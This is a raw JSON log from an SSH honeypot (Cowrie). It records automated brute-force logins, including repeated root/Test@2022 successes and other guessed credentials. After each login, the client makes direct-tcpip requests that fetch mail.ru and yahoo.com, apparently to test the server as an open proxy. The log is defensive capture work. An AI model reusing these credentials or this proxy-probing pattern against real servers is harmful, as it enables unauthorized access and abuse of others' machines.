{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.665812Z","src_ip":"77.83.207.83","session":"c671e5eda088"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":23437,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:23437","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.717280Z","session":"c671e5eda088"}
{"eventid":"cowrie.login.failed","username":"admin","password":"woof","message":"login attempt [admin/woof] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.741797Z","src_ip":"212.227.125.160","session":"124b28fd63c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.767101Z","src_ip":"77.83.207.83","session":"c671e5eda088"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52242,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef8bd078a237","protocol":"ssh","message":"New connection: 212.227.125.160:52242 (1.2.3.4:22) [session: ef8bd078a237]","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.773863Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2899,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2899","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.908336Z","session":"c671e5eda088"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.958555Z","src_ip":"77.83.207.83","session":"c671e5eda088"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":17976,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17976","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.100173Z","session":"c671e5eda088"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.150476Z","src_ip":"77.83.207.83","session":"c671e5eda088"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.201379Z","src_ip":"77.83.207.83","session":"c671e5eda088"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":1400,"dst_ip":"1.2.3.4","dst_port":22,"session":"fac1b1daf24d","protocol":"ssh","message":"New connection: 77.83.207.83:1400 (1.2.3.4:22) [session: fac1b1daf24d]","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.251077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.251803Z","src_ip":"77.83.207.83","session":"fac1b1daf24d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.302052Z","src_ip":"77.83.207.83","session":"fac1b1daf24d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.522053Z","src_ip":"212.227.125.160","session":"ef8bd078a237"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.522779Z","src_ip":"212.227.125.160","session":"ef8bd078a237"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.552065Z","src_ip":"77.83.207.83","session":"fac1b1daf24d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10529,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:10529","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.603256Z","session":"fac1b1daf24d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.653555Z","src_ip":"77.83.207.83","session":"fac1b1daf24d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":15250,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15250","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.796374Z","session":"fac1b1daf24d"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.802654Z","src_ip":"212.227.125.160","session":"124b28fd63c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.846571Z","src_ip":"77.83.207.83","session":"fac1b1daf24d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":62,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:62","sensor":"my-vps","timestamp":"2025-08-31T03:48:08.988679Z","session":"fac1b1daf24d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.039100Z","src_ip":"77.83.207.83","session":"fac1b1daf24d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.090743Z","src_ip":"77.83.207.83","session":"fac1b1daf24d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":1485,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f72a49d81ac","protocol":"ssh","message":"New connection: 77.83.207.83:1485 (1.2.3.4:22) [session: 0f72a49d81ac]","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.138891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.139825Z","src_ip":"77.83.207.83","session":"0f72a49d81ac"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.189495Z","src_ip":"77.83.207.83","session":"0f72a49d81ac"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.436775Z","src_ip":"77.83.207.83","session":"0f72a49d81ac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26413,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:26413","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.487265Z","session":"0f72a49d81ac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.536868Z","src_ip":"77.83.207.83","session":"0f72a49d81ac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5623,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:5623","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.679954Z","session":"0f72a49d81ac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.729717Z","src_ip":"77.83.207.83","session":"0f72a49d81ac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":24287,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24287","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.872027Z","session":"0f72a49d81ac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.921689Z","src_ip":"77.83.207.83","session":"0f72a49d81ac"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:09.972026Z","src_ip":"77.83.207.83","session":"0f72a49d81ac"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":1561,"dst_ip":"1.2.3.4","dst_port":22,"session":"070d98cc1bab","protocol":"ssh","message":"New connection: 77.83.207.83:1561 (1.2.3.4:22) [session: 070d98cc1bab]","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.021587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.022578Z","src_ip":"77.83.207.83","session":"070d98cc1bab"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.072947Z","src_ip":"77.83.207.83","session":"070d98cc1bab"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.324887Z","src_ip":"77.83.207.83","session":"070d98cc1bab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17883,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17883","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.376814Z","session":"070d98cc1bab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.427459Z","src_ip":"77.83.207.83","session":"070d98cc1bab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10957,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:10957","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.568752Z","session":"070d98cc1bab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.619237Z","src_ip":"77.83.207.83","session":"070d98cc1bab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":10864,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10864","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.760858Z","session":"070d98cc1bab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.811641Z","src_ip":"77.83.207.83","session":"070d98cc1bab"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.862840Z","src_ip":"77.83.207.83","session":"070d98cc1bab"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":1628,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0f4a23d4683","protocol":"ssh","message":"New connection: 77.83.207.83:1628 (1.2.3.4:22) [session: f0f4a23d4683]","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.912368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.913005Z","src_ip":"77.83.207.83","session":"f0f4a23d4683"}
{"eventid":"cowrie.login.failed","username":"master","password":"123456","message":"login attempt [master/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.962282Z","src_ip":"212.227.125.160","session":"ef8bd078a237"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:10.963175Z","src_ip":"77.83.207.83","session":"f0f4a23d4683"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:11.212682Z","src_ip":"77.83.207.83","session":"f0f4a23d4683"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5065,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:5065","sensor":"my-vps","timestamp":"2025-08-31T03:48:11.264210Z","session":"f0f4a23d4683"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:11.314256Z","src_ip":"77.83.207.83","session":"f0f4a23d4683"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":32292,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:32292","sensor":"my-vps","timestamp":"2025-08-31T03:48:11.456588Z","session":"f0f4a23d4683"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:11.506954Z","src_ip":"77.83.207.83","session":"f0f4a23d4683"}
